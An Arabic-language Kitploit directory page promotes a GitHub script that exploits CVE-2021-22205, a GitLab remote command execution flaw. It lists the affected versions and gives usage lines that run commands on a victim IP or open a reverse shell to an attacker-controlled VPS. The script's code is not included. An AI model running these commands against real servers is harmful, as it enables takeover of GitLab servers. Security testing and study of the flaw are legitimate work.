Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-22205 — سكربت كشف CVE-2021-22205، يدعم getshell وتنفيذ الأوامر | Kitploit
أدوات/GitHubGitHub/keven1z/cve-2021-22205
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubkeven1z/cve-2021-22205

CVE-2021-22205

سكربت كشف CVE-2021-22205، يدعم getshell وتنفيذ الأوامر

عرض المستودع
123منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-22205

نظرًا لأن GitLab لا يتحقق بشكل صحيح من ملفات الصور التي يتم تمريرها إلى محلل الملفات، فإن ذلك يؤدي إلى تنفيذ أوامر. يمكن للمهاجم إنشاء طلبات خبيثة لاستغلال هذه الثغرة لتنفيذ أوامر عشوائية على النظام المستهدف، مما يؤدي في النهاية إلى السيطرة على خادم GitLab. وبما أن معظم النصوص البرمجية على الإنترنت تفتقر إلى ميزة الـ reverse shell، لذلك قمت بتعديل النص البرمجي المكتوب على الإنترنت وإضافة ميزة getshell بضغطة واحدة.

الإصدارات المتأثرة

  • 11.9 <= GitLab(CE/EE)< 13.8.8
  • 13.9 <= GitLab(CE/EE)< 13.9.6
  • 13.10 <= GitLab(CE/EE)< 13.10.3

تعليمات الاستخدام

root@kitploit:~
	  ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____  
	 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___| 
	| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 
	| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
 	\____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/ 
    	
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
                         [-p PORT]

GitLab < 13.10.3 RCE

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标URL
  -c COMMAND, --command COMMAND
                        执行命令
  --shell               是否反弹shell
  -i IP, --ip IP        反弹shell ip
  -p PORT, --port PORT  反弹shell端口

الاستخدام

root@kitploit:~
python3 CVE-2021-22205.py -t [受害者ip] --shell -i [vps ip] -p [vps port] //反弹shell
python3 CVE-2021-22205.py -t [受害者ip] -c [command] //执行命令

إخلاء المسؤولية

هذا النص البرمجي مخصص للاستخدام في الاختبار فقط، ولا يجوز استخدامه لأغراض أخرى.

تنزيل الأداة